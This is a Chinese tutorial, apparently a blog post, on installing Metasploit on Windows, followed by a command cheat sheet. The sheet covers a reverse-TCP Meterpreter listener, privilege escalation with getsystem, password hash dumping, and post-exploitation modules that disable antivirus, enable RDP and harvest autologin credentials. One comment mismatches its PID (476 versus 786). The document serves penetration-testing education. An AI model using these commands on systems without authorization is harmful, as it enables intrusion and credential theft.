前言
Kali Linux 系统中已经自带 Metasploit 渗透框架就不过多介绍了。本文主要介绍如何在 Windows 系统环境下安装部署 Metasploit 渗透框架。
0x01 工具简介
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。Metasploit是少数几个可用于执行诸多渗透测试步骤的工具,其社区拥有超过200000名成员,是全球最大的信息安全交流社区。当前社区成员及Rapid7核心研发团队每天都在更新Metasploit功能框架,不断完善,来给渗透测试从业者更优的使用体验。
Windows版本安装包
- 官网下载地址:https://windows.metasploit.com/metasploitframework-latest.msi
- 百度云备份地址:https://pan.baidu.com/s/19pc4depNN-930A43gk5PNg 提取码:
kd0t
0x02 工具安装
下载安装包到本地,直接点击安装即可
记住本地安装的路径,安装完成后添加系统环境变量
打开Windows cmd命令行输入 msfconsole
即可启动 Metasploit
0x03 工具使用
MSF常用参数命令:
- reload_all #从目录重载所有模块
- back #后退命令,移出当前上下文,用于模块切换
- info #目标和模块详细信息
- check #检查目标是否受某个漏洞影响
- sessions #会话管理
- sessions -l #列出所有会话
- sessions -K #终止所有会话
- sessions -i id #进入某个会话
- sessions -v #以详细模式列出会话
- sessions -u #在许多平台上将shell升级到meterpreter会话
- show options #显示可选选项;
MSF漏洞利用步骤:
- search xxx #搜索某个漏洞
- use xxx #使用某个漏洞利用模块
- show options #查看配置选项
- set payload #配置攻击载荷
- exploit/run #执行渗透攻击
MSF监听反弹shell:
- msf6 > use exploit/multi/handler
- msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
- msf6 exploit(multi/handler) > set LHOST 0.0.0.0
- msf6 exploit(multi/handler) > set LPORT 4444
- msf6 exploit(multi/handler) > run
Meterpreter命令:
- pwd、ls、cd、ps、cat #通用命令
- background #将当前meterpreter会话隐藏在后台sessions中
- getpid #查看当前Meterpreter Shell的进程号
- getuid #查看当前权限
- migrate 476 #将shell迁移到PID为786的进程中
- getsystem #获得系统管理员权限(要本地管理员权限运行)
- hashdump #抓哈希密码
- sysinfo #查看系统信息
- route #查看目标机完整网络设置
- shell #进入目标机shell,exit退出shell
- upload ./1.txt c:1.txt #上传文件
- download c:1.txt ./ #下载文件
- search -f *.txt -d c:// #搜索文件
MSF后渗透命令:
- run post/windows/gather/checkvm #查看目标是否允许在虚拟机
- run post/windows/manage/killav #关闭杀毒软件
- run post/windows/manage/enable_rdp #开启3389远程桌面
- run post/windows/manage/autoroute #查看目标子网情况
- run post/windows/gather/enum_logged_on_users #列举当前有多少用户登录过目标主机
- run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名密码
- run post/windows/gather/enum_applications #列举应用程序